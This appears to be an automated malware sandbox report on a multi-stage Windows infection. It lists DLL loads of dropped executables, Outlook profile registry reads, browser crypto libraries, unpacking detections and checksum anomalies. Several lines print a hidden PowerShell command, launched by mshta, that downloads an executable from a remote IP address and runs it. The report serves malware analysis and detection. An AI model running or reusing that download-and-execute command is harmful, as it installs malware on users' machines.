Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1062353001\f8fdf848d8.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062354001\ec93a94e48.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1062351001\0436fcd702.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: tmp86E5.tmp.14.dr

LNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: random.exe

Static file information: File size 1863168 > 1048576

Source: random.exe

Static PE information: Raw size of xnqbglnd is bigger than: 0x100000 < 0x19a600

Source:	Binary string: mozglue.pdbP source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186850902.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: freebl3.pdb source: freebl3.dll.2.dr
Source:	Binary string: C:\AdminC4\Workspace\1654247295\Project\Debug\Project.pdb source: 51c549c9c2.exe.11.dr
Source:	Binary string: freebl3.pdbp source: freebl3.dll.2.dr
Source:	Binary string: nss3.pdb@ source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: nss3.pdb source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186528818.000000006C59F000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: mozglue.pdb source: AGDDD2MYZL6KQO94XW.exe, 00000002.00000002.2186850902.000000006F8ED000.00000002.00000001.01000000.0000000F.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\AGDDD2MYZL6KQO94XW.exe	Unpacked PE file: 2.2.AGDDD2MYZL6KQO94XW.exe.f50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;crzarjak:EW;flqcehaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;crzarjak:EW;flqcehaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\HYCURX00F7L1ZQ3FYN.exe	Unpacked PE file: 3.2.HYCURX00F7L1ZQ3FYN.exe.cc0000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.780000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062348001\5f198671b1.exe	Unpacked PE file: 12.2.5f198671b1.exe.af0000.0.unpack :EW;.rsrc:W;.idata :W;vfbpzacx:EW;epyoeyfm:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;vfbpzacx:EW;epyoeyfm:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062349001\1cfdc82c16.exe	Unpacked PE file: 13.2.1cfdc82c16.exe.a30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fihicggg:EW;ymizzuio:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fihicggg:EW;ymizzuio:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062352001\48b7eec64e.exe	Unpacked PE file: 18.2.48b7eec64e.exe.e50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;crzarjak:EW;flqcehaa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;crzarjak:EW;flqcehaa:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE	Unpacked PE file: 46.2.TempBUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE.90000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'BUCVAPINNJNDM77PBYPAVFOC4POLOPHT.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

Source: random[1].exe1.11.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 48b7eec64e.exe.11.dr	Static PE information: real checksum: 0x1c7c7f should be: 0x1ccc82
Source: 5f198671b1.exe.11.dr	Static PE information: real checksum: 0x632ddb should be: 0x62bfd9
Source: NEGM0426B51QOF76X3GO8.exe.16.dr	Static PE information: real checksum: 0x1c7c7f should be: 0x1ccc82
Source: random[3].exe0.11.dr	Static PE information: real checksum: 0x1cf8b1 should be: 0x1cc937
Source: random[2].exe0.11.dr	Static PE information: real checksum: 0x1c7c7f should be: 0x1ccc82
Source: random[3].exe.11.dr	Static PE information: real checksum: 0x1dac20 should be: 0x1daeb9
Source: random[1].exe0.11.dr	Static PE information: real checksum: 0x1d0bdc should be: 0x1dd5fb
Source: random[2].exe.11.dr	Static PE information: real checksum: 0x1e0fed should be: 0x1de5d3
Source: fee976e9bb.exe.11.dr	Static PE information: real checksum: 0x1e0fed should be: 0x1de5d3
Source: random[1].exe1.11.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: f64eac2185.exe.11.dr	Static PE information: real checksum: 0x1dac20 should be: 0x1daeb9
Source: AGDDD2MYZL6KQO94XW.exe.0.dr	Static PE information: real checksum: 0x1c7c7f should be: 0x1ccc82
Source: random[1].exe.11.dr	Static PE information: real checksum: 0x632ddb should be: 0x62bfd9
Source: tmpE345.tmp.14.dr	Static PE information: real checksum: 0x1d3685 should be: 0x1d2a3d
Source: 071b4af2c1.exe.11.dr	Static PE information: real checksum: 0x1cf8b1 should be: 0x1cc937
Source: 275588fe9c.exe.11.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: HYCURX00F7L1ZQ3FYN.exe.0.dr	Static PE information: real checksum: 0x2e848b should be: 0x2e6730
Source: N9RHN6UAFCLUOOV6DH7.exe.16.dr	Static PE information: real checksum: 0x2e848b should be: 0x2e6730
Source: random.exe	Static PE information: real checksum: 0x1d3685 should be: 0x1d2a3d
Source: 1cfdc82c16.exe.11.dr	Static PE information: real checksum: 0x1d0bdc should be: 0x1dd5fb
Source: 0436fcd702.exe.11.dr	Static PE information: real checksum: 0x1c708b should be: 0x1cdf47
Source: skotes.exe.3.dr	Static PE information: real checksum: 0x2e848b should be: 0x2e6730
